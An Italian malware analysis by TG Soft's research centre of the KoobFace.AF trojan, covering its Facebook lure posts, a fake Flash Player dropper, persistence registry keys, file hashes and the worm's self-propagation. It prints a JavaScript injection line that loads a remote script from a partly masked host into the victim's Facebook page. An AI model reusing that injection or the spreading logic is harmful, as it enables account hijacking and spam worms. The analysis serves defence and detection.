Trojan.Win32.KoobFace.AF
 |
È un trend ormai consolidato quello di utilizzare strumenti ad alto potenziale comunicativo per la diffusione massiva di malware, puntando molto sulla "viralità" delle nuove mode di comunicazione e sulla larga diffusione che riescono a raggiungere in pochissimo tempo, sfruttando molto spesso la stessa curiosità degli utenti.
Social network come Facebook e Twitter, attraverso i quali è possibile raggiungere un enorme target di utenti, sono diventati l'obiettivo e lo strumento degli attacchi di malware di nuova generazione. |
Tra le varie minacce circolanti su questi network, una sta spiccando come diffusione e numero di infezioni in questa seconda settimana di Gennaio. Dal 16 Gennaio, infatti, si è registrato un notevole aumento delle infezioni provocate da alcuni file riconducibili alla famiglia di malware identificata da TG Soft come Trojan.Win32.KoobFace.AF.
Tutto comincia su una banale pagina facebook, che invita il visitatore a cliccare sui collegamenti presenti per visualizzare i migliori video di YouTube. Il trucco per attirare il visitatore su questa pagina è il classico coinvolgimento personale sul proprio profilo, dove vengono lasciati commenti che riportano a quella pagina facendo riferimento a qualche non meglio specificato video e se ci si riconosca nel video.
"www,facebook,com/2xxxxxxxxxxxxx4 <--- ma sei te in sto video ??? (metti dei punti al posto delle virgole ♥)" è un tipico esempio di questi post, come si può vedere dalle immagini riportate di seguito.
Raggiunta la pagina facebook suggerita, ci si trova di fronte ad una pagina semi-clone di YouTube (cfr. Fig. 2) che ci propone di cliccare per vedere il nostro video. Seguendo l'indicazione si viene riportati ad un sito che questa volta è un perfetto clone di YouTube (cfr. Fig. 3). Naturalmente il dominio è camuffato e non è assolutamente affiliato a quello ufficiale.
Appena si prova a guardare il video che dovrebbe riguardarci, dall'emblematico titolo "La persona più stupida al mondo ahahahaha", viene fatto notare che per riuscire a visualizzarlo correttamente è necessario scaricare un plug-in mancante, per la precisione l'Adobe Flash Player 11.0.
Il file che viene fatto scaricare chiaramente non ha nulla a che vedere con l'Adobe Flash Player, è solamente un malware che sfrutta la stessa icona e lo stesso nome del file (cfr Fig. 4) per ingannare l'utente che lo scarica fiducioso. Il file viene intercettato da Vir.IT eXplorer 6.8.89 e successivi con il nome di Trojan.Win32.Scar.RJ. L'infezione verrebbe quindi già bloccata a questo livello per chi è fornito di Vir.IT eXplorer PRO aggiornato e attivo sul computer.
Dettagli tecnici sul file:
| Nome File: |
AdobeFlashPalyer_11.0.2.exe |
| Md5: |
da10c1bc8493951d1ae96e67fc69fe21 |
| Dimensione: |
347277 byte |
| Versione: |
3.3.6.1 |
| Malware: |
Trojan.Win32.Scar.RJ |
Se il file trova campo libero e riesce ad essere eseguito sul computer, scarica e installa altri malware. Il primo ad essere scaricato ed eseguito è un file chiamato upme.exe, che si pone in esecuzione automatica tramite la chiave di registro Run del profilo utente corrente con il nome upme. Il file viene intercettato e rimosso da
Vir.IT eXplorer 7.0.71 e successivi con il nome di
Trojan.Win32.KoobFace.AF.
Dettagli tecnici sul file:
| Nome File: |
upme.exe |
| Md5: |
be47dad36bc1b06105085dc29a0e130e |
| Dimensione: |
357745 byte |
| Versione: |
3.3.6.1 |
| Percorso: |
C:\log\upme.exe |
| Chiave di registro: |
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
[upme] = C:\log\upme.exe |
| Compressione: |
Script Autoit |
| Malware: |
Trojan.Win32.KoobFace.AF |
Una volta avviato e assicuratosi di essere eseguito ad ogni avvio di Windows modificando la chiave di registro indicata nella tabella soprastante, il
Trojan.Win32.KoobFace.AF scarica altri malware della sua stessa famiglia, ma con file leggermente diversi in dimensione e tutti uguali tra loro.
Dettagli tecnici sul file:
| Nome File: |
GamerOSD.exe, GoogleUpdate.exe, hamachi.exe, iexplore.exe, Openoffice.exe, Skype.exe, StikyNote.exe |
| Md5: |
49d62b4b8662b2d6b14b6c78acfc9d91 |
| Dimensione: |
393619 byte |
| Versione: |
3.3.6.1 |
| Percorso: |
%temp%\{nome_applicazione}\{nome_file}.exe Oppure %AppData%\{nome_applicazione}\{nome_file}.exe |
| Chiave di registro: |
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
[{nome_applicazione}] = {percorso_file}\{nome_file}.exe |
| Compressione: |
Script Autoit |
| Malware: |
Trojan.Win32.KoobFace.AF |
Questi file, in realtà tutti uguali e copie dello stesso file, sono distribuiti tra la cartella Dati Applicazioni del profilo dell'utente corrente e la cartella dei file temporanei. Per camuffarsi e non risultare troppo sospetti assumono nomi di applicazioni realmente esistenti, anche se non sono installate nel sistema. Riportiamo alcuni nomi e percorsi che hanno assunto durante la nostra analisi a scopo di esempio:
Chiave di registro: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Valori:
- [iexplorer] = C:\Documents and Settings\{nome_utente}\Dati applicazioni\Windows\iexplore.exe
- [Openoffice] = C:\Documents and Settings\{nome_utente}\Dati applicazioni\Openoffice\Openoffice.exe
- [Hamachi] = C:\Documents and Settings\{nome_utente}\Impostazioni Locali\Temp\Hamachi\ Hamachi.exe
Quando uno di questi malware è attivo sul sistema, resta in attesa che venga eseguito l'accesso a FaceBook dal computer infetto monitorando l'indirizzo visitato dal proprio browser. Quando viene eseguito l'accesso in FaceBook, il virus sostituisce l'indirizzo corrente con uno JavaScript nella barra degli indirizzi e lo manda in esecuzione. Il JavaScript della forma: javascript:(a=(b=document).createElement('script')).src='http://hapxxxxxxxxy.altervista.org/v/i/p/h/p/k_my.js',b.body.appendChild(a);void(0), non fa altro che appendere alla pagina corrente (cioè la pagina di FaceBook) un JavaScript preso da un sito infetto dal nome k_my.js.
Dettagli tecnici sul file:
| Nome File: |
k_my.js |
| Md5: |
25bc88de2b2008db2ed7801931863fac |
| Dimensione: |
4157 byte |
| Compressione: |
N/A |
| Malware: |
Trojan.JS.FB.A |
Analizzando il codice JavaScript del file k_my.js, si evince che la sua funzione è quella di recuperare l'intera lista di amici e la lista di pagine su cui si è cliccato "Mi Piace" e poi, iterando attraverso l'intera lista con due cicli distinti, postare sui profili dei propri amici e sulla bacheca delle pagine il testo iniziale da cui era partita tutta l'infezione: www,facebook,com/2xxxxxxxxxxxxx4 <--- ma sei te in sto video ??? (metti dei punti al posto delle virgole ♥).
In questo modo si garantisce una diffusione esponenziale e a macchia d'olio se le persone che ricevono il post sono abbastanza curiose da andare a vedere il link appena ricevuto e quindi diffondere a loro volta linfezione.
Il malware Trojan.Win32.KoobFace.AF nasconde questi post sulla pagina di chi li ha fatti se il computer infetto, quindi non ci si rende conto dell'accaduto finché qualcuno non ce lo segnali. Nel caso doveste incorrere incautamente in uno di questi link o notare strani comportamenti del vostro computer o i vostri amici vi segnalano post che non siete stati voi a fare, il consiglio è quello di effettuare una scansione completa del computer con un AntiVirus aggiornato, come ad esempio Vir.IT eXplorer Lite, scaricabile gratuitamente dalla nostra Homepage https://www.tgsoft.it e compatibile con il vostro attuale antivirus installato, oppure utilizzare la versione commerciale Vir.IT eXplorer PRO.
Roberto Spagliccia
C.R.A.M. Centro Ricerche Anti Malware by TG Soft
Ogni informazione pubblicata sul nostro sito può essere utilizzata e pubblicata su altri siti internet, blog, forum, facebook e/o in ogni altra forma sia in modalità cartacea che elettronica a patto che venga sempre e comunque citata la fonte esplicitamente "Fonte: C.R.A.M. by TG Soft www.tgsoft.it"
